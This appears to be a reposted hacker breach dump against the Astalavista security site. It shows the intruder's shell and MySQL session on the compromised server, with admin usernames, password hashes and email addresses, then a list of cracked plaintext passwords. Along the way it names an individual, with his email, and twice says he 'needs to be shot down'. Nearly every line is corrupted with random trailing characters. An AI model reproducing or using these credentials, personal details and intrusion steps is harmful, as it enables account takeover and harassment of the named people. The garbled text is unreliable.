5 d( p" L$ {& h9 ?% R$ O            $comExploits[$x]['enddate']   = ‘0000-00-00′;8 M! Q( D2 j+ `/ e1 H. {
            $comExploits[$x]['status']    = ‘1′;# t) ^- A' S/ {1 a
            $comExploits[$x]['changelog'] = $date;
8 W* W- S+ ]; ~
( s# s" A2 W# l: ]& X        }9 N3 S& V. l2 |% Q
[snip]2 z6 L4 e+ b/ n# M; ~* z
    $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>
( Z& n! T1 p- [$ ?<rss version=”2.0″>
$ _- w2 x% g2 a8 `$ P    <channel># w6 y$ }! J. E1 [5 f  U
        <title>ASTALAVISTA.com - Exploits</title>4 q' z- X3 Z2 p* D0 r# C1 j
        <link>http://www.astalavista.com/exploits</link>) v, o% T  y* {+ @5 n4 [+ I
        <description>All availably Exploits.</description>( [( w$ l  B1 W- E) _7 s: ~
        <language>en-us</language>) S2 T' ?( I( y1 y8 W
        <lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>
; V0 i! t) Z+ d        <docs>http://blogs.law.harvard.edu/tech/rss</docs>
; o4 f$ P* }% x: X) G        <generator>Astalavista.com</generator>! G" p' R2 n1 F1 H/ P. `
        <webMaster>info@astalavista.com</webMaster>’ . $items . ‘9 f# @( d, m- A+ a) J! F
    </channel>
4 ~6 x8 _) u( I+ c; G8 b</rss>’;
4 q% L$ i0 o+ D4 e. y6 w0 Q: u. F4 j2 i1 S
    if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {
5 F8 w: f  c8 @! |        unlink (FULLPATH . ‘/feed/exploits.xml’);) ~( i8 G$ O( |3 m
    }5 n: {; V/ J$ }& S6 H& \9 a6 i9 ~

1 S( d' _4 w/ V    file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);
. p$ P- G; p5 p* n1 j[snip]+ P( ~8 {1 M6 x  N8 S( {

1 {0 h, h( h2 hsh-3.2$ cat exploits.sh! j; ]+ w6 J+ U9 N
#!/bin/sh& a% A8 H/ ~$ [1 Y) {2 S9 {
6 u$ O. q1 r: D: W: G
###########################################################. }/ K. F( k4 H! q2 P( H
#                                                         #& K- w* A- s3 c. Z9 E. M& G
#   Title:        milw0rm exploits adder                  #0 G  H- A; K" L/ ]9 N. J' l+ g+ z% G
#   Description:  Add all milw0rm exploits to the         #
8 `9 C) E4 w; O; [! }#                 Astalavista.com database                #
" r' N, c' ^7 Q3 m1 k: c/ e! V#                                                         #; r: H: {0 R& x- h. b
#   Company:      Astalavista Group                       #
% |$ T+ s+ a- f' J0 O! Z#   Author:       Paulo M. Santos                         #
* N" c8 z' a$ Y( K1 n7 t#   E-Mail:       链接标记paulo.santos@astalavista.ch             #; B" |5 i6 p2 y: S+ t2 p5 H
#                                                         #
5 b' D, G$ E& g: ^' f: n5 i###########################################################
( e! k4 {# r, j) ^/ h! r" L! _0 ~6 v; k. L1 Q
# path
# F$ Q; x' Y' X9 dthis_path=/home/com/public_html/modifications/cronjobs
8 m! l% W% v. ]
$ r& _. z6 F! P# change directory
% m1 e) S" ~) pcd $this_path1 Q" Z- O7 f* E, d3 {
cd tmp/
6 T8 i: L$ E6 j- G/ f# F% ^9 f) K, ?) x$ J9 X* i1 p4 M2 Z
# delete files
7 y3 [. o% r. s+ n/ u4 I' E7 G0 Q) Orm -rf milw0rm.tar.* &$ N  Z; x+ ?) }
rm -rf milw0rm/ &
+ z/ O0 J' E7 a
; T3 v' D" t+ }  w+ p# wget milw0rm paket
/ u2 S$ `; r& C7 |$ nwget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]
3 F( a/ K) a& R2 M8 V) k- \8 \
( i4 {8 S  U( ~" {4 t/ U! m  P# extract milw0rm paket
; K+ A3 H. Q1 X2 v- J- wtar -xvf milw0rm.tar.bz22 N9 o) u! o: j  ]" i
. ~& {& R; B- j$ O
# change owner; ^) E6 C1 _1 g- `! G- }
chown -R com .' ?) P4 N( _% q7 A' k
chgrp -R com .
4 h& }9 I1 a. c+ z9 {
6 U5 r+ `  L7 f, a# execute php script. B! F; z, Z1 ?
cd $this_path
3 B3 d( @2 M( y8 e  z# ?2 Aphp -q exploits.php  A, K( o* T4 _9 d# A6 _( }
# r; A' v/ o5 o) J
# delete files
1 F4 d) ?  n* X1 l: _4 |rm -rf tmp/milw0rm.tar.*. e: |* R( j% R' k8 h- I7 S
rm -rf tmp/milw0rm/9 m, P5 W& V1 m

; R, P1 ]( q6 t4 x( h7 M5 msh-3.2$ echo “Paulo M. Santos needs to be shot down.”& G  L8 D0 Y) _$ f
Paulo M. Santos needs to be shot down.
' V) ]# \$ d  H8 Q  @. b9 z$ n% u$ |8 U2 g  K. `! z
mysql -u contrexxuser2 -p! {: g  q9 J& m: l
Enter password:
9 A+ b$ s* ~! ~Welcome to the MySQL monitor.  Commands end with ; or \g.+ [) B, O% n/ ]# |2 b) u
Your MySQL connection id is 261694
( n+ L  f+ ^* ~Server version: 5.0.45-community-log MySQL Community Edition (GPL)
6 o7 g. O. k2 W7 ]' o9 c% l4 h/ P* O* e$ \
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
3 R1 t5 j6 t3 a4 u* [
4 o; r8 C6 P9 @) Smysql> show databases;
0 s5 y1 g6 h7 w. z+——————–+
/ n5 M: O2 j6 b| Database           |
( d3 @) a7 A/ b) @8 b/ w- c+——————–+
0 S0 P0 c9 g5 d) `# b, x1 ~| information_schema |$ L* S; Z+ b* U# G# Q6 j
| com_contrexx2      |8 v; {$ `9 @; z9 N' m
| com_contrexx2_live |: F  e) p* N, W
| test               |
2 }9 t  F) x' i- U+——————–+
, W9 h0 _/ ?2 O& f& D9 M4 rows in set (0.00 sec)
0 P  s1 `- w  I6 j2 f8 k, `0 d- g/ ~
4 Y8 D/ T* T: x0 K; o! mmysql> use com_contrexx2_live4 O/ F! B6 }( I1 K# }% l) p$ F. ^
Database changed5 N( K$ A+ D: B4 I1 K8 X
mysql> show tables;
, d- c2 v2 y# G. p& ]+————————————————–+) }) L7 X6 X8 S' r9 s
| Tables_in_com_contrexx2_live                     |$ Z% b  n/ @9 K# C, W( k
+————————————————–+
5 @0 {) F& ?- }/ Y% F( u9 ^+ B# B8 K" @- Z| cc_banner_counter                                |) e3 [8 @. i& [: L" v* ^
| cc_search_counter                                |
$ P5 @( O4 \! j5 b5 b# w| contrexx_access_group_dynamic_ids                |# U) C/ t5 @1 f. n7 S% Q
| contrexx_access_group_static_ids                 |
" _3 u) R4 W2 u* w% R3 ]| contrexx_access_rel_user_group                   |& h2 m, R  c% h3 Z9 d
| contrexx_access_settings                         |' q; `) `9 j3 `9 V+ K9 c
| contrexx_access_user_attribute                   |% H8 O- B8 \/ W
| contrexx_access_user_attribute_name              |  h- j0 d+ ~  z$ Q/ @
| contrexx_access_user_attribute_value             |
/ L6 W# z+ F# H+ }| contrexx_access_user_core_attribute              |
3 P7 ?+ V+ U1 L1 K9 ?+ }; g' q| contrexx_access_user_groups                      |
' ~* M2 N$ L! t( d, i" t: W, w| contrexx_access_user_mail                        |7 C/ k* M( V! e- l! |) T1 a4 X
| contrexx_access_user_profile                     |
$ k( [6 Z: j) H" n* {| contrexx_access_user_title                       |* b* [: }1 [# E4 v) Q/ G# X, V
| contrexx_access_user_validity                    |& t3 h% ~: |9 Y# y1 W1 Y
| contrexx_access_users                            |
- P# [) G/ }- g9 q' h3 P* D| contrexx_backend_areas                           |
* `4 r) V' D8 q; ?| contrexx_backups                                 |( Q& M; m; E. O9 k0 R; v' l
| contrexx_content                                 |2 R( G- Y1 f5 P9 A$ [
| contrexx_content_history                         |
3 x4 `/ j! H$ o% D% u* S6 p| contrexx_content_logfile                         |
  I- g4 n) Y* }, n) K! M| contrexx_content_navigation                      |2 r  x  s) C. ?: P- m" F' S9 Z
| contrexx_content_navigation_history              |
& {4 K8 ~9 ?. p8 z| contrexx_ids                                     |
& z& i# N- k0 ^  `3 p; w| contrexx_languages                               |6 J6 a, T4 f: i7 ~. X' N9 n. I
| contrexx_lib_country                             |
8 `: O4 h- ]7 X| contrexx_log                                     |
' `* e) S: r, b2 a  Q/ x3 C# }| contrexx_module_alias_source                     |' O  ?' }& N0 ?
| contrexx_module_alias_target                     |
) G, J& f3 X6 d% H' f( d' s| contrexx_module_block_blocks                     |
8 R" m. u% v$ \4 I$ X# v) W! `| contrexx_module_block_rel_lang                   |
" u$ ?. H' T3 k+ g. k| contrexx_module_block_rel_pages                  |. F5 x& t% |0 M) Q! d% Y8 L1 U
| contrexx_module_block_settings                   |
4 B5 h  B( ~0 g  w3 \8 v| contrexx_module_blog_categories                  |6 X1 x' h& g) Q; m/ |
| contrexx_module_blog_comments                    |8 e% [) r# ^! R: X5 W
| contrexx_module_blog_message_to_category         |
5 m4 R9 A6 a5 g) O+ W| contrexx_module_blog_messages                    |* t* _: U2 g# G6 `$ O
| contrexx_module_blog_messages_lang               |
! k. {5 ]5 E# P8 Q8 Y| contrexx_module_blog_networks                    |
8 A4 J2 ]! y* ^% c% H' @0 ^7 H9 b| contrexx_module_blog_networks_lang               |
8 D7 ]* r1 H2 P| contrexx_module_blog_settings                    |' v  ~1 V  Z7 y" ]
| contrexx_module_blog_votes                       |/ c" g! c+ ^% d
| contrexx_module_calendar                         |
  J  Z+ P9 B  N' ]  i| contrexx_module_calendar_access                  |9 N' c0 x( }9 _
| contrexx_module_calendar_categories              |
. Y, {7 ~' ]) u- i# D+ A| contrexx_module_calendar_form_data               |9 V& C; o" m$ \# J8 L; a
| contrexx_module_calendar_form_fields             |
* |" J/ e4 l3 C% g( f) U| contrexx_module_calendar_registrations           |" ~* A0 C9 h+ X: a$ ?7 O' M
| contrexx_module_calendar_settings                |; ]& d7 j) M# u5 q
| contrexx_module_calendar_style                   |$ ~6 P6 L8 Z+ u( c( ]# B
| contrexx_module_contact_form                     |
" H6 i' M1 v7 a4 Z3 L| contrexx_module_contact_form_data                |
% S, [9 q/ v, P2 j) A| contrexx_module_contact_form_field               |* K8 i& B- V4 ?" q) r' |: d7 Z
| contrexx_module_contact_settings                 |& Y  W+ b2 i! p
| contrexx_module_data_categories                  |
- X: ^0 h4 x' K3 Z" P' Z; N9 b' L2 w| contrexx_module_data_message_to_category         |
" ?' d& ^. C# D1 e| contrexx_module_data_messages                    |. j! q) u3 v( T( v6 B7 O  q1 F
| contrexx_module_data_messages_lang               |/ c! m: j" b- I) T+ w" W: D
| contrexx_module_data_placeholders                |4 X8 I' X3 Q. x: E
| contrexx_module_data_settings                    |
2 J3 A$ ^  \8 Z' m8 H| contrexx_module_directory_access                 |
9 e' W- r! V$ ]+ L. e9 p  S, w| contrexx_module_directory_categories             |
+ H! S4 M8 Q6 E+ @, u# C# N| contrexx_module_directory_dir                    |
  w( h% h2 b1 X. j( b) }8 l| contrexx_module_directory_inputfields            |
2 D) @) j; p; Y" c* F  E2 r| contrexx_module_directory_levels                 |
: ^: r% U6 }$ _: p. i| contrexx_module_directory_mail                   |. J: D, {. t- g" P/ e7 S9 }& I
| contrexx_module_directory_rel_dir_cat            |
" ^4 R! v, P$ R2 m1 y| contrexx_module_directory_rel_dir_level          |
! u) t  X& r, r* I, I7 W$ E| contrexx_module_directory_settings               |
; [/ @# o( l1 L) q; @0 X/ }  a| contrexx_module_directory_settings_google        |
6 @( x! `! S& ]% C| contrexx_module_directory_vote                   |
- C, f- Q7 p9 ?* s3 y* a1 w( `| contrexx_module_docsys                           |$ n& k2 p" b9 r
| contrexx_module_docsys_categories                |2 ?+ i: d8 ?3 @! A7 l+ y
| contrexx_module_egov_configuration               |
' ?% Z4 b4 }0 u- ]& w* _2 y| contrexx_module_egov_orders                      |4 x# Q* Q# t$ Z8 @/ A& [( L
| contrexx_module_egov_product_calendar            |
8 k& A+ f: h0 l3 f1 w& i$ b# b| contrexx_module_egov_product_fields              |& j1 k. W4 o( w2 `' L
| contrexx_module_egov_products                    |( D1 B2 r+ N- _) P
| contrexx_module_egov_settings                    |
6 |% e8 ~9 c, _0 n| contrexx_module_exploits                         |* B( Y$ `7 K3 M
| contrexx_module_exploits_categories              |9 K9 N+ G1 k( d+ q0 A( b* G
| contrexx_module_feed_category                    |
( W' }* R0 A" O! G3 w# n3 b. X| contrexx_module_feed_news                        |
6 M& I7 j& Z9 e! S| contrexx_module_feed_newsml_association          |; y" L  n' z. U: {
| contrexx_module_feed_newsml_categories           |" y+ l& F; |- B1 e
| contrexx_module_feed_newsml_documents            |
% m( R, j' d- B/ |5 W( {' B$ Y; G| contrexx_module_feed_newsml_providers            |
* P5 g, w# o- e* M4 C& Q| contrexx_module_forum_access                     |: Y$ e2 C9 I8 `4 D3 M
| contrexx_module_forum_categories                 |
9 M) r6 i& @) N# G. I| contrexx_module_forum_categories_lang            |6 \6 o: D* i; z1 ]! @4 ?; ?
| contrexx_module_forum_notification               |
( F: P9 Z/ Z  j, Y. u8 G4 Q| contrexx_module_forum_postings                   |# r) y+ L2 d" {" x) l
| contrexx_module_forum_rating                     |$ D5 E. u* J: s8 D7 T9 l
| contrexx_module_forum_settings                   |3 F7 e1 R. a  y: r! L3 F
| contrexx_module_forum_statistics                 |8 r% h9 g7 E- g/ o7 J5 S3 |0 V: [
| contrexx_module_gallery_categories               |8 g  N% z/ _6 ]  T+ b
| contrexx_module_gallery_comments                 |' |% p/ C6 Y2 G6 y& ^9 {+ v5 }
| contrexx_module_gallery_language                 |8 {; w8 t5 L  o: z
| contrexx_module_gallery_language_pics            |
! i! k0 q2 d5 T5 h: G! O; v| contrexx_module_gallery_pictures                 |* v$ O# }( b% K* @' ^5 g$ H
| contrexx_module_gallery_settings                 |- n0 ~) A2 v3 Y8 W: X
| contrexx_module_gallery_votes                    |
9 E5 N8 P3 ^; K( Y* L5 y| contrexx_module_guestbook                        |' Y" u) K2 _5 n7 d% z+ T, `
| contrexx_module_guestbook_settings               |  Z8 I  P9 l. {: o5 F% H. d
| contrexx_module_livecam                          |
' ~/ n* k# ~) @, x  {| contrexx_module_livecam_settings                 |
. M! t2 m& ]$ E# o! C| contrexx_module_market                           |7 F0 Z4 \! m* M- J
| contrexx_module_market_access                    |. C. e2 M9 C; _2 Y0 `
| contrexx_module_market_categories                |
9 G9 P# m& T( S/ F1 z; U( _& i| contrexx_module_market_mail                      |  _+ _5 L' h5 U' Q* }
| contrexx_module_market_paypal                    |
5 u# K0 g: O, |6 r: Q| contrexx_module_market_settings                  |
0 Z1 }: G! Q0 V$ `- T| contrexx_module_market_spez_fields               |
" ~7 I4 D; o9 m9 s( I9 l/ r! Y| contrexx_module_mediadir_access                  |
& {1 V* H/ ?# ^1 W! ^& q3 F| contrexx_module_mediadir_categories              |
& |, u2 [" K1 X$ E5 X  B| contrexx_module_mediadir_comments                |
& H3 H- q: A/ a# v| contrexx_module_mediadir_dir                     |  o7 ~$ B: G* V% e: H  y
| contrexx_module_mediadir_inputfields             |
4 _% H" ^+ ^3 T1 K. X3 O| contrexx_module_mediadir_levels                  |5 Y6 s! v  a" w# q0 T. d
| contrexx_module_mediadir_mail                    |" x% b* F, N) i  e+ s1 v, U
| contrexx_module_mediadir_rel_dir_cat             |, d  _2 v1 m7 T& ^
| contrexx_module_mediadir_rel_dir_level           |' d7 L5 v! K- Z) ?! E" E6 O
| contrexx_module_mediadir_reports                 |6 S/ u" p  W  ]2 z& K
| contrexx_module_mediadir_settings                |
3 x  P$ ~0 T1 e) f9 o| contrexx_module_mediadir_settings_google         |
, O, \$ X, J8 V' ?* ~/ w| contrexx_module_mediadir_vote                    |
8 V$ Q2 ?; F/ d* G5 c, \| contrexx_module_memberdir_directories            |% E3 m: H6 I# e, E! r
| contrexx_module_memberdir_name                   |
4 w6 D$ [$ P  _| contrexx_module_memberdir_settings               |
8 `4 X9 r* D4 ~3 @! h2 B| contrexx_module_memberdir_values                 |3 P/ s% L/ ^# T# p
| contrexx_module_nettools_allowed_groups          |, G9 j) c$ T- u+ T. U/ @2 _
| contrexx_module_nettools_settings                |
' e$ `2 l2 \9 i8 L| contrexx_module_news                             |
; L: O: o& i, Z% s: f! O| contrexx_module_news_access                      |1 ]2 K4 |( `) ^3 \& j
| contrexx_module_news_categories                  |
" j# h; t9 }# V4 t7 F| contrexx_module_news_settings                    |/ b+ f# H0 ]* `7 g, _1 D! _
| contrexx_module_news_teaser_frame                |! l' t" m" ~7 [% j" g$ S
| contrexx_module_news_teaser_frame_templates      |
9 M: E) D0 i+ W. F. ]| contrexx_module_news_ticker                      |2 ]* Y' o! i4 z1 a
| contrexx_module_newsletter                       |
* e& Q1 V1 w4 G9 J$ R$ @| contrexx_module_newsletter_attachment            |
% u: F0 W* o: Y! j6 {$ K9 s| contrexx_module_newsletter_category              |
' k9 ?" H# o& |" J| contrexx_module_newsletter_confirm_mail          |) ~+ y8 r3 Z8 |/ Y+ b
| contrexx_module_newsletter_rel_cat_news          |
+ Y$ l$ k; ?+ k7 E5 A| contrexx_module_newsletter_rel_user_cat          |
1 o) e. ]5 {; }0 M2 j+ K. ~| contrexx_module_newsletter_settings              |" W9 e4 }, q4 h% h+ @0 S
| contrexx_module_newsletter_template              |
, V2 X9 R! |9 P3 B; K6 y| contrexx_module_newsletter_tmp_sending           |
. h, x0 B* ~  B5 P: i) t' a; k. [| contrexx_module_newsletter_user                  |
$ M- `$ [2 `+ D/ g| contrexx_module_newsletter_user_title            |1 N" r* K4 v' h( Q
| contrexx_module_onlinetools_defaultports         |8 I+ X- x" q/ X: l7 ~9 c
| contrexx_module_onlinetools_defaultports_back    |4 \- c9 P( k- G& ~2 b2 h9 O9 `9 m+ R
| contrexx_module_onlinetools_geolitecity_blocks   |% a+ R7 b& G7 Y7 r8 U. b) I$ g
| contrexx_module_onlinetools_geolitecity_country  |. O7 m& |  ^% H! y
| contrexx_module_onlinetools_geolitecity_location |
8 {, K9 o3 X' U| contrexx_module_podcast_category                 |
( G$ R( l8 C( A% l' l| contrexx_module_podcast_medium                   |" B! c! W. i& E% h
| contrexx_module_podcast_rel_category_lang        |
9 X' V3 I2 h3 v& w) F0 {" i! ?| contrexx_module_podcast_rel_medium_category      |
. {% ?% j" `- M+ r  K- ?& o: }| contrexx_module_podcast_settings                 |
  [  S' S! e, Y8 D| contrexx_module_podcast_template                 |
# N  t* e3 S, m" t% M1 j| contrexx_module_proxydb                          |
+ C! u6 U/ y6 g7 A- F6 `0 W( d6 q| contrexx_module_recommend                        |
7 {9 |3 Q/ x: W4 A& z9 H; C7 _/ O| contrexx_module_repository                       |5 }- d: F- l% e5 x( z7 j
| contrexx_module_securitynews_cats                |
; L: D7 v* h/ g6 B# u( a' e| contrexx_module_securitynews_feeds               |1 y7 Y1 X% O7 P" f
| contrexx_module_securitynews_news                |
' v, {; m# i( Z" Z4 ^| contrexx_module_shop_categories                  |9 j1 i4 `4 {  r* M% Y4 b; ^
| contrexx_module_shop_config                      |$ w6 U7 I( r" j
| contrexx_module_shop_countries                   |
' l9 \, |1 z5 b2 Y* V$ x+ V| contrexx_module_shop_currencies                  |
7 o3 Z& a! Z! i+ r' U| contrexx_module_shop_customers                   |
; w$ l4 V, S! E) w' n! [| contrexx_module_shop_importimg                   |* n( e8 Z( N9 Y9 n+ K, o  c( n
| contrexx_module_shop_lsv                         |  K3 p' u$ i0 _1 F# N
| contrexx_module_shop_mail                        |; Y; A; f# _7 M
| contrexx_module_shop_mail_content                |+ U" T2 u( q% z& o. v3 m8 X
| contrexx_module_shop_manufacturer                |3 h( J& R* N# q; C9 ?
| contrexx_module_shop_order_items                 |
8 h3 M3 k) B+ \5 r& v4 m| contrexx_module_shop_order_items_attributes      |
1 m4 G' S- Z; D| contrexx_module_shop_orders                      |5 k) Y$ S8 D* j) {7 G
| contrexx_module_shop_payment                     |% P$ H" N/ r4 U. ?6 B8 v2 ^
| contrexx_module_shop_payment_processors          |
) o# F: c  a/ x: [0 O3 k2 b+ a& w5 e| contrexx_module_shop_pricelists                  |. ^! X3 N* A9 u* P7 c: m
| contrexx_module_shop_products                    |3 k) \# Z+ B1 }/ ?
| contrexx_module_shop_products_attributes         |1 U6 I+ ?3 u2 e8 m. |- w
| contrexx_module_shop_products_attributes_name    |- C. n/ q+ P2 Y/ C
| contrexx_module_shop_products_attributes_value   |0 E* k4 m$ k% `3 T# I- Z, u' d
| contrexx_module_shop_products_downloads          |
! f. M6 N9 i& n: y% j0 F( C| contrexx_module_shop_rel_countries               |; @# V) j$ l/ [- z
| contrexx_module_shop_rel_payment                 |
1 [( O; z$ {  {% M$ p| contrexx_module_shop_rel_shipment                |3 B8 B# n( S+ v' P) k
| contrexx_module_shop_shipment_cost               |
8 y' K; B, q( T| contrexx_module_shop_shipper                     |
& K4 M* V- F6 }- ?! p| contrexx_module_shop_vat                         |
' a& K  X( J! h/ {( _: c| contrexx_module_shop_zones                       |
, X+ v  r8 j6 f" l9 G( K$ d2 {| contrexx_module_u2u_address_list                 |, y4 v9 F3 s+ z% N
| contrexx_module_u2u_message_log                  |) Z* k4 \( ~* m6 ?% R% R% F% |
| contrexx_module_u2u_sent_messages                |
+ ~2 F% Z4 P: L0 y6 v$ d4 z| contrexx_module_u2u_settings                     |" v1 g4 W; S' E& D- V6 V
| contrexx_module_u2u_user_log                     |, T2 m" c: ~5 }5 J) b% b
| contrexx_modules                                 |
2 s; _; Z9 V; p0 w/ Z| contrexx_sessions                                |
8 L3 w- M& X1 y7 H| contrexx_settings                                |
! O  u/ j, W9 I' l8 b/ W" r, h| contrexx_settings_smtp                           |
4 e/ p" F+ U' `  m| contrexx_skins                                   |0 r9 C0 y* ]* Q( I9 w
| contrexx_stats_browser                           |
7 v" g6 Z6 r5 A5 m) f$ r| contrexx_stats_colourdepth                       |& |2 u5 J% k- O( A; B
| contrexx_stats_config                            |
" P, z/ C6 M: b; @* ]8 G! k| contrexx_stats_country                           |  O7 N1 r3 S7 Q9 ]% y. a! Z" ^
| contrexx_stats_hostname                          |3 q  Y: @9 s  H6 d  C3 v6 a4 L6 O- q1 {
| contrexx_stats_javascript                        |
" \! A) n/ \9 g" X+ T/ h4 s| contrexx_stats_operatingsystem                   |
9 K" S& g% y5 l1 f& L+ y| contrexx_stats_referer                           |" ?8 ~. T6 J: `% f! i2 a! N
| contrexx_stats_requests                          |, J, ]% u1 b9 S( T; [. J: E
| contrexx_stats_requests_summary                  |
) \0 K+ m4 M3 [$ Q| contrexx_stats_screenresolution                  |0 a7 r, {( S7 z/ [& b
| contrexx_stats_search                            |9 K6 v% a: f! [. M6 D+ R
| contrexx_stats_spiders                           |
- ^8 z. [6 j' a| contrexx_stats_spiders_summary                   |
% V7 z5 |5 C/ ?6 @0 G| contrexx_stats_visitors                          |! @7 z% N: F: I/ n2 G# x+ ]
| contrexx_stats_visitors_summary                  |# X$ |& e' \* @8 M
| contrexx_voting_additionaldata                   |
+ _. D$ ?/ Y  P2 G- o* y2 s$ H| contrexx_voting_email                            |2 ^) R0 n' ^" f8 r3 G* D
| contrexx_voting_rel_email_system                 |3 ?) ]0 F0 ?+ W
| contrexx_voting_results                          |
* a! B# H8 k. y1 w- Z' p| contrexx_voting_system                           |
& i7 u- I! }( q7 k; o9 {8 {| foo                                              |  D2 k* U9 T+ N! x$ \
+————————————————–+
" V# s  v1 N# q% _4 g227 rows in set (0.01 sec)
  @8 r8 M5 ^& b. b4 X! _
& q2 R0 A" C6 e" R7 V0 g5 Nmysql> select count(*) as skids from contrexx_access_users;  i$ O/ g# n, U4 d% H6 k
+——-+
$ J* X! ]: M4 O: ~7 M| skids |- H; _7 T3 M. C. z2 Q& B, K
+——-+5 b) C+ v7 c$ A; ~, T( E
| 53699 |2 y9 K# C: c' O2 ^
+——-+' k4 G7 U3 M6 m% a6 \! Q" l
1 row in set (0.00 sec)
+ [& `3 @5 q; J/ H; g
- U; I) g" Q  j+ |6 f( Zmysql> describe contrexx_access_users;- B* V. ^7 e% w
+——————+——————————————+——+—–+————–+—————-+5 D+ h. k+ F& I7 H
| Field            | Type                                     | Null | Key | Default      | Extra          |
$ u5 q" i# N; }! ?+——————+——————————————+——+—–+————–+—————-+
, k  \& U2 c$ {; y- g: u/ X| id               | int(10) unsigned                         | NO   | PRI | NULL         | auto_increment |; `# M, U+ |" y3 u( L
| is_admin         | tinyint(1) unsigned                      | NO   |     | 0            |                |8 h: j0 z: Q( K' b1 N% J
| username         | varchar(40)                              | YES  | MUL | NULL         |                |
& s6 o. m% I% t; G1 u8 B| password         | varchar(32)                              | YES  |     | NULL         |                |9 o6 U# g$ r, ?1 U6 k  _4 [
| regdate          | int(14) unsigned                         | NO   |     | 0            |                |
) F& J. v# w* j' o| expiration       | int(14) unsigned                         | NO   |     | 0            |                |9 U* `% ~- x0 R2 x6 @
| validity         | int(10) unsigned                         | NO   |     | 0            |                |
/ ?5 @$ x2 m* S9 N| last_auth        | int(14) unsigned                         | NO   |     | 0            |                |
9 T) n6 F) E. \3 u" e' z* ?* D| last_activity    | int(14) unsigned                         | NO   |     | 0            |                |6 k9 n) E" ~! \; H& |0 T7 I
| email            | varchar(255)                             | YES  |     | NULL         |                |3 m+ u: c, q: I
| email_access     | enum(’everyone’,'members_only’,'nobody’) | NO   |     | nobody       |                |: Y- w* i4 V# A+ B& E
| frontend_lang_id | int(2) unsigned                          | NO   |     | 0            |                |
* T9 @0 F  R& f: ?| backend_lang_id  | int(2) unsigned                          | NO   |     | 0            |                |: U. w: D; d5 y  s6 M! T& j; s
| active           | tinyint(1)                               | NO   |     | 0            |                |
) Q5 }: P  \# W# Z| profile_access   | enum(’everyone’,'members_only’,'nobody’) | NO   |     | members_only |                |2 I& S  ^7 ^0 O' `2 X
| restore_key      | varchar(32)                              | NO   |     |              |                |
1 _/ ]* p  X0 t/ u: W  m- P$ @| restore_key_time | int(14) unsigned                         | NO   |     | 0            |                |* D; [5 B6 Y5 o" ~/ P5 y9 |3 n
| u2u_active       | enum(’0′,’1′)                            | NO   |     | 1            |                |
1 ~" [) R' c) m, v% q3 @+ p; F+——————+——————————————+——+—–+————–+—————-+, c0 A" P6 w" Y5 z
18 rows in set (0.00 sec)
3 E$ M& ~3 y7 Y0 v8 t
& I; m# l# T0 F% u/ Y  gmysql> select username,password,email from contrexx_access_users where is_admin = 1;
6 ^: g; j3 r' ?) ^% \7 _+————+———————————-+—————————–+
: m, l& R4 D- X" _& N% ^| username   | password                         | email                       |3 f7 E: V* l7 \2 w' `" |& V
+————+———————————-+—————————–+) g( u' D2 X) y: E9 p2 T
| system     | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com          |3 U: K# s  `" O
| prozac     | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com      |
0 w' A4 d7 P: C0 S| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |. G5 P/ v! p! O/ s3 C3 a- K
| schmid     | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com   |$ `2 z4 d+ c" B2 R, `
+————+———————————-+—————————–+
( _; Q+ z7 `. W! f% }: ~3 \$ y/ w4 rows in set (0.04 sec)3 z) `7 K$ i; g8 T

1 t' I- d3 t4 B4 v8 |5 S4 [mysql> exit;8 @, a1 r, J$ T' m: V
Bye1 {, t* `& |- h
9 z) W, q: e+ ~! ^0 }9 f: t) E" I* _. Z
[~] There you go, your “team of security and IT professionals” is a joke.
! Y1 [* q6 F3 Q5 p: I( c) r1 u# J+ G8 D# V" d& d# X2 ]
+——————————+
1 G& a  C% [$ dsystem:f82BN3+_*% c) Q( w2 Q- Z
Be1er0ph0r:belerophor4astacom
* N) ]& t6 U; ^* P: \prozac:asta4cms!
9 ~6 z5 ]5 C+ s) ycommander:mpbdaagf6m
7 \5 R+ B* r, |5 b6 N1 Usykadul:ak29eral# _7 G4 j; G, H. Q" I: f% e- w
+——————————+
0 D0 X1 w5 {% F; t% t7 V8 \& M$ J- n" ~- p
[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)$ Z0 t2 g! }! K6 m1 b% b! L$ j
…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.; e0 h) E3 Z) u) r6 w
, o. X# P$ Q' {) ^! O* Y
[~] Lets move to astalavista.net now,5 W$ I5 ]4 G) M  }* c/ x/ g: }
9 s( e3 b0 s6 _0 Y: D+ `" x! I7 X) \
From <链接标记[url]https://www.astalavista.net/[/url]>:
6 B% W! L4 {2 z( c2 E' Z4 a>> Everyone knows that the best defense is a good offense.
2 q2 E+ r9 h3 J3 s% Z( K) u1 f6 H>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.) ]- N+ K6 Y% z; H& |# t2 E4 U& `
>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.
! j* @: W- d$ q. V4 M>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”) w: G2 s+ ~' m3 r$ J

3 z3 w* B. Z, X/ u2 y" X% G>> Go ahead, try and hack our server . in a completely legal way!
5 ]" e. [0 @* ^2 v3 q! {/ ^/ F" s; G>> Learn by doing: We offer our members tricky tasks and challenges on an. B/ C+ \9 H" D" ], D+ c8 T6 ~
>> ongoing basis so you can test your knowledge and abilities. You can also. }) m* h0 x3 ~0 p$ B) f# v- A
>> demonstrate what you.ve mastered by taking part in regular hacker contests+ e, \4 f' j4 X* }
>> and war games
" _* t+ U% i" ]5 o- s; q# S) g1 e% n/ c
[~] Lets take a look there, after all… they are hack-proof, aren’t they?!
4 K- e  x3 e0 f6 u' _
! `7 c/ R' S$ r$ Y[-] Tricky task: Find home dir of astalavista.net
3 E( l; t! ~; N7 }  \3 ~7 p8 ?; s; a  _4 _( y6 B
sh-3.2$ ls -la ~astanet! e- Y3 Z# O) x  [0 z7 P5 S7 b
